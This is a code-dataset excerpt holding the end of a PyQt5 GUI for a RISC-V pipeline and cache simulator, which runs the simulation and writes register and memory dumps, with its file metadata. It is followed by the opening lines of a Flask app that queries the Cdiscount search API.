QtWidgets.QTableWidgetItem(\"Contents\"))\n\n i=0\n for key, value in dic.items():\n self.tableWidget2.insertRow(self.tableWidget2.rowCount())\n self.tableWidget2.setItem(self.tableWidget2.rowCount()-1, 0,\n QtWidgets.QTableWidgetItem(str(key)))\n s = [str(i) for i in value]\n self.tableWidget2.setItem(self.tableWidget2.rowCount()-1, 1,\n QtWidgets.QTableWidgetItem(\" | \".join(s)))\n print(key, \"|\".join(s))\n\n def pipeline_no_fwd_selected(self, selected): #without data forwarding\n if selected:\n global pipeline\n pipeline = 1\n\n def pipeline_fwd_selected(self, selected): #with data forwarding\n if selected:\n global pipeline\n pipeline = 2\n\n def non_pipeline_selected(self, selected):\n if selected:\n global pipeline\n pipeline = 0\n\n def assemble(self):\n importlib.reload(RunSim_forward)\n importlib.reload(RunSim_stall)\n importlib.reload(RunSim_non_pipelined)\n importlib.reload(MachineCodeParser)\n MachineCodeParser.parser(sys.argv[1])\n RunSim_forward.memory.InitMemory(MachineCodeParser.PC_INST, MachineCodeParser.DATA, int(self.line_edit1.text()), int(self.line_edit2.text()), int(self.line_edit3.text()), int(self.line_edit4.text()), int(self.line_edit5.text()), int(self.line_edit6.text()))\n RunSim_stall.memory.InitMemory(MachineCodeParser.PC_INST, MachineCodeParser.DATA, int(self.line_edit1.text()), int(self.line_edit2.text()), int(self.line_edit3.text()), int(self.line_edit4.text()), int(self.line_edit5.text()), int(self.line_edit6.text()))\n RunSim_non_pipelined.memory.InitMemory(MachineCodeParser.PC_INST, MachineCodeParser.DATA, int(self.line_edit1.text()), int(self.line_edit2.text()), int(self.line_edit3.text()), int(self.line_edit4.text()), int(self.line_edit5.text()), int(self.line_edit6.text()))\n\n def padhexa(self, s):\n return '0x' + s[2:].zfill(8)\n\n def run(self):\n if pipeline==0:\n RunSim_non_pipelined.RunSim(1,1)\n if pipeline==1:\n RunSim_stall.RunSim(1,1)\n if pipeline==2:\n RunSim_forward.RunSim(1,1)\n if pipeline==0:\n self.update_inst_cache(RunSim_non_pipelined.memory.text_module.cache_module.cache_dict)\n self.update_data_cache(RunSim_non_pipelined.memory.data_module.cache_module.cache_dict)\n #print(RunSim_non_pipelined.memory.text_module.cache_module.cache_dict)\n if pipeline==1:\n self.update_inst_cache(RunSim_stall.memory.text_module.cache_module.cache_dict)\n self.update_data_cache(RunSim_stall.memory.data_module.cache_module.cache_dict)\n #print(RunSim_stall.memory.text_module.cache_module.cache_dict)\n if pipeline==2:\n self.update_inst_cache(RunSim_forward.memory.text_module.cache_module.cache_dict)\n self.update_data_cache(RunSim_forward.memory.data_module.cache_module.cache_dict)\n #print(RunSim_forward.memory.text_module.cache_module.cache_dict)\n #def print_reg(arr): # input is numpy array\n with open(f\"RegisterDump.mc\", \"w\") as fileReg:\n for i in range(32): # for all 32 registers\n fileReg.write(f\"x{i} \") # print address of register for eg. x5\n if (RunSim_forward.registers.reg[i] >= 0):\n fileReg.write(self.padhexa(hex(RunSim_forward.registers.reg[i])).upper().replace('X', 'x'))\n else:\n reg = RunSim_forward.registers.reg[i] & 0xffffffff # signed\n fileReg.write(hex(reg).upper().replace('X', 'x'))\n fileReg.write(\"\\n\")\n\n #dumping memory\n with open(f\"MemoryDump.mc\", \"w\") as fileMem: # input is dictionary with key as address and value as data\n lst = [] # stores keys present in dictionary\n temp_lst = [] # stores base address\n for key in RunSim_forward.memory.data_module.memory:\n lst.append(key)\n lst.sort()\n for x in lst:\n temp = x - (x % 4) # storing base address in temp\n if temp not in temp_lst: # if base address not present in temp_list , then append it\n temp_lst.append(temp)\n temp_lst.sort()\n for i in temp_lst:\n fileMem.write(f\"{(self.padhexa(hex(i)).upper().replace('X', 'x'))} \") # printing base address\n if i in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i])).upper())[8:]} \" ) # if key in dictionary, print its data\n else:\n fileMem.write(\"00 \") # if key not in dictionary, print 00\n if (i + 1) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i + 1])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n if (i + 2) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i + 2])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n if (i + 3) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i + 3])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n fileMem.write(\"\\n\") # new line\n lst = [] # stores keys present in dictionary\n temp_lst = []\n for key in RunSim_forward.memory.text_module.memory:\n lst.append(key)\n lst.sort()\n for x in lst:\n temp = x - (x % 4) # storing base address in temp\n if temp not in temp_lst: # if base address not present in temp_list , then append it\n temp_lst.append(temp)\n temp_lst.sort()\n for i in temp_lst:\n fileMem.write(f\"{(self.padhexa(hex(i)).upper().replace('X', 'x'))} \") # printing base address\n if i in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i])).upper())[8:]} \" ) # if key in dictionary, print its data\n else:\n fileMem.write(\"00 \") # if key not in dictionary, print 00\n if (i + 1) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i + 1])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n if (i + 2) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i + 2])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n if (i + 3) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i + 3])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n fileMem.write(\"\\n\") # new line\n print(\"\\033[1;92mRegister and memory outputs written in RegisterDump.mc and MemoryDump.mc respectively\\033[0m\")\n importlib.reload(RunSim_forward)\n importlib.reload(RunSim_stall)\n importlib.reload(RunSim_non_pipelined)\n importlib.reload(MachineCodeParser)\n\n def step(self):\n if pipeline==0:\n RunSim_non_pipelined.RunSim_step(1,1)\n if pipeline==1:\n RunSim_stall.RunSim_step(1,1)\n if pipeline==2:\n RunSim_stall.RunSim_step(1,1)\n if pipeline==0:\n self.update_inst_cache(RunSim_non_pipelined.memory.text_module.cache_module.cache_dict)\n self.update_data_cache(RunSim_non_pipelined.memory.data_module.cache_module.cache_dict)\n\n #print(RunSim_non_pipelined.memory.text_module.cache_module.cache_dict)\n if pipeline==1:\n self.update_inst_cache(RunSim_stall.memory.text_module.cache_module.cache_dict)\n self.update_data_cache(RunSim_stall.memory.data_module.cache_module.cache_dict)\n #print(RunSim_stall.memory.text_module.cache_module.cache_dict)\n if pipeline==2:\n self.update_inst_cache(RunSim_forward.memory.text_module.cache_module.cache_dict)\n self.update_data_cache(RunSim_forward.memory.data_module.cache_module.cache_dict)\n #print(RunSim_forward.memory.text_module.cache_module.cache_dict)\n #def print_reg(arr): # input is numpy array\n with open(f\"RegisterDump.mc\", \"w\") as fileReg:\n for i in range(32): # for all 32 registers\n fileReg.write(f\"x{i} \") # print address of register for eg. x5\n if (RunSim_forward.registers.reg[i] >= 0):\n fileReg.write(self.padhexa(hex(RunSim_forward.registers.reg[i])).upper().replace('X', 'x'))\n else:\n reg = RunSim_forward.registers.reg[i] & 0xffffffff # signed\n fileReg.write(hex(reg).upper().replace('X', 'x'))\n fileReg.write(\"\\n\")\n\n #dumping memory\n with open(f\"MemoryDump.mc\", \"w\") as fileMem: # input is dictionary with key as address and value as data\n lst = [] # stores keys present in dictionary\n temp_lst = [] # stores base address\n for key in RunSim_forward.memory.data_module.memory:\n lst.append(key)\n lst.sort()\n for x in lst:\n temp = x - (x % 4) # storing base address in temp\n if temp not in temp_lst: # if base address not present in temp_list , then append it\n temp_lst.append(temp)\n temp_lst.sort()\n for i in temp_lst:\n fileMem.write(f\"{(self.padhexa(hex(i)).upper().replace('X', 'x'))} \") # printing base address\n if i in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i])).upper())[8:]} \" ) # if key in dictionary, print its data\n else:\n fileMem.write(\"00 \") # if key not in dictionary, print 00\n if (i + 1) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i + 1])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n if (i + 2) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i + 2])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n if (i + 3) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i + 3])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n fileMem.write(\"\\n\") # new line\n lst = [] # stores keys present in dictionary\n temp_lst = []\n for key in RunSim_forward.memory.text_module.memory:\n lst.append(key)\n lst.sort()\n for x in lst:\n temp = x - (x % 4) # storing base address in temp\n if temp not in temp_lst: # if base address not present in temp_list , then append it\n temp_lst.append(temp)\n temp_lst.sort()\n for i in temp_lst:\n fileMem.write(f\"{(self.padhexa(hex(i)).upper().replace('X', 'x'))} \") # printing base address\n if i in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i])).upper())[8:]} \" ) # if key in dictionary, print its data\n else:\n fileMem.write(\"00 \") # if key not in dictionary, print 00\n if (i + 1) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i + 1])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n if (i + 2) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i + 2])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n if (i + 3) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i + 3])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n fileMem.write(\"\\n\") # new line\n\n # def run(self):\n\n # #import temp_main\n # # code to start running the code\n # # code to add data in register text Box\n # #code = self.MachineCode.toPlainText()\n # #print(code)\n # #fhand = open(\"gui_instructions.mc\", 'r')\n # #fhand.write(code)\n # #fhand.close()\n\n\n # #print(MachineCodeParser.PC_INST)\n # # program load\n # #RiscSim.memory.InitMemory(MachineCodeParser.PC_INST)\n # # Run the simulator\n # #RiscSim.RunSim()\n # ###temp_main.runMain()\n # # reg = np.array([1, -2, 3])\n # value = self.line_edit1.text()\n # print(int(value))\n # value = self.line_edit2.text()\n # print(int(value))\n # value = self.line_edit3.text()\n # print(int(value))\n # print(pipeline)\n\n\n # # f = open(\"cache_specs.txt\", \"w\")\n # # f.write(self.line_edit1.text()+\" \"+self.line_edit2.text()+\" \"+self.line_edit3.text())\n # # f.close()\n\n # #temp_main.runMain(pipeline)\n # if pipeline == 0:\n # import RunSim_non_pipelined\n # RunSim_non_pipelined.memory.InitMemory(MachineCodeParser.PC_INST, MachineCodeParser.DATA)\n # RunSim_non_pipelined.RunSim()\n # #add dumping functions\n # self.update_inst_cache(RunSim_non_pipelined.memory.text_module.cache_module.cache_dict)\n #self.update_data_cache(RunSim_non_pipelined.memory.data_module.cache_module.cache_dict)\n\n\n # #code to add memory in memory text Box\n # dic = {19: 3, 4: 11, 6: 7, 241: 241}\n #self.update_memory(RiscSim.memory.memory_module.memory)\n #importlib.reload(temp_main)\n #importlib.reload(MachineCodeParser)\n\n\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n", "sub_path": "src/not_stable/GUI_Cache/gui_mem.py", "file_name": "gui_mem.py", "file_ext": "py", "file_size_in_byte": 25217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PyQt5.QtGui.QFont", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 16, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 19, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 19, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 21, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 22, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 22, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 23, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 28, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 28, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 29, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 31, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 31, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 32, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 36, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 36, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 37, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 39, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 39, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 40, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 44, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 44, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 45, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 45, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 47, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 47, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 48, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 48, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 51, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 52, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 52, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 54, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 54, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 55, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 55, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 58, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 58, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 59, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 59, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 61, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 61, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 62, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 62, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 66, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 66, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 68, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 68, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 69, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 69, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QRadioButton", "line_number": 72, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 72, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 73, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QRadioButton", "line_number": 76, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 76, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 77, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 77, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QRadioButton", "line_number": 80, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 80, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 81, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 81, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 85, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 85, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 86, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 86, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 87, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 87, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 88, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 88, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 90, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 90, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 91, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 91, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 92, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 92, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidget", "line_number": 103, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 103, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 104, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 104, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 110, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 110, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 111, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 111, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 112, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 112, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 113, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 113, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 115, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 115, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 116, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 117, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 117, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidget", "line_number": 121, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 121, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 122, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 122, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 127, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 127, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 128, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 128, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 130, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 130, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 131, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 131, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 133, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 133, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 134, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 134, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMenuBar", "line_number": 137, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 137, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 138, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 138, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QStatusBar", "line_number": 141, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 141, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QMetaObject.connectSlotsByName", "line_number": 146, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QMetaObject", "line_number": 146, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 146, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QCoreApplication", "line_number": 154, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 154, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 185, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 185, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 186, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 186, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 193, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 193, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 196, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 196, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 210, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 210, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 211, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 211, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 218, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 218, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 221, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 221, "usage_type": "name"}, {"api_name": "importlib.reload", "line_number": 240, "usage_type": "call"}, {"api_name": "importlib.reload", "line_number": 241, "usage_type": "call"}, {"api_name": "importlib.reload", "line_number": 242, "usage_type": "call"}, {"api_name": "importlib.reload", "line_number": 243, "usage_type": "call"}, {"api_name": "MachineCodeParser.parser", "line_number": 244, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 244, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory.InitMemory", "line_number": 245, "usage_type": "call"}, {"api_name": "RunSim_forward.memory", "line_number": 245, "usage_type": "attribute"}, {"api_name": "MachineCodeParser.PC_INST", "line_number": 245, "usage_type": "attribute"}, {"api_name": "MachineCodeParser.DATA", "line_number": 245, "usage_type": "attribute"}, {"api_name": "RunSim_stall.memory.InitMemory", "line_number": 246, "usage_type": "call"}, {"api_name": "RunSim_stall.memory", "line_number": 246, "usage_type": "attribute"}, {"api_name": "MachineCodeParser.PC_INST", "line_number": 246, "usage_type": "attribute"}, {"api_name": "MachineCodeParser.DATA", "line_number": 246, "usage_type": "attribute"}, {"api_name": "RunSim_non_pipelined.memory.InitMemory", "line_number": 247, "usage_type": "call"}, {"api_name": "RunSim_non_pipelined.memory", "line_number": 247, "usage_type": "attribute"}, {"api_name": "MachineCodeParser.PC_INST", "line_number": 247, "usage_type": "attribute"}, {"api_name": "MachineCodeParser.DATA", "line_number": 247, "usage_type": "attribute"}, {"api_name": "RunSim_non_pipelined.RunSim", "line_number": 254, "usage_type": "call"}, {"api_name": "RunSim_stall.RunSim", "line_number": 256, "usage_type": "call"}, {"api_name": "RunSim_forward.RunSim", "line_number": 258, "usage_type": "call"}, {"api_name": "RunSim_non_pipelined.memory", "line_number": 260, "usage_type": "attribute"}, {"api_name": "RunSim_non_pipelined.memory", "line_number": 261, "usage_type": "attribute"}, {"api_name": "RunSim_stall.memory", "line_number": 264, "usage_type": "attribute"}, {"api_name": "RunSim_stall.memory", "line_number": 265, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 268, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 269, "usage_type": "attribute"}, {"api_name": "RunSim_forward.registers", "line_number": 275, "usage_type": "attribute"}, {"api_name": "RunSim_forward.registers", "line_number": 276, "usage_type": "attribute"}, {"api_name": "RunSim_forward.registers", "line_number": 278, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 286, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 297, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 301, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 305, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 309, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 315, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 326, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 330, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 334, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 338, "usage_type": "attribute"}, {"api_name": "importlib.reload", "line_number": 343, "usage_type": "call"}, {"api_name": "importlib.reload", "line_number": 344, "usage_type": "call"}, {"api_name": "importlib.reload", "line_number": 345, "usage_type": "call"}, {"api_name": "importlib.reload", "line_number": 346, "usage_type": "call"}, {"api_name": "RunSim_non_pipelined.RunSim_step", "line_number": 350, "usage_type": "call"}, {"api_name": "RunSim_stall.RunSim_step", "line_number": 352, "usage_type": "call"}, {"api_name": "RunSim_stall.RunSim_step", "line_number": 354, "usage_type": "call"}, {"api_name": "RunSim_non_pipelined.memory", "line_number": 356, "usage_type": "attribute"}, {"api_name": "RunSim_non_pipelined.memory", "line_number": 357, "usage_type": "attribute"}, {"api_name": "RunSim_stall.memory", "line_number": 361, "usage_type": "attribute"}, {"api_name": "RunSim_stall.memory", "line_number": 362, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 365, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 366, "usage_type": "attribute"}, {"api_name": "RunSim_forward.registers", "line_number": 372, "usage_type": "attribute"}, {"api_name": "RunSim_forward.registers", "line_number": 373, "usage_type": "attribute"}, {"api_name": "RunSim_forward.registers", "line_number": 375, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 383, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 394, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 398, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 402, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 406, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 412, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 423, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 427, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 431, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 435, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 494, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 494, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 494, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 495, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 495, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 499, "usage_type": "call"}]} +{"seq_id": "539917392", "text": "#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport os\nimport requests\nimport json\nfrom random import randrange\nfrom flask import Flask, render_template, request, session\n\napp = Flask(__name__)\n\napp.secret_key = 'aLi\\24/caM\\11/Gas\\13/.'\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef home():\n if request.method == 'GET':\n url = \"https://api.cdiscount.com/OpenApi/json/Search\"\n params = {\n \"ApiKey\": 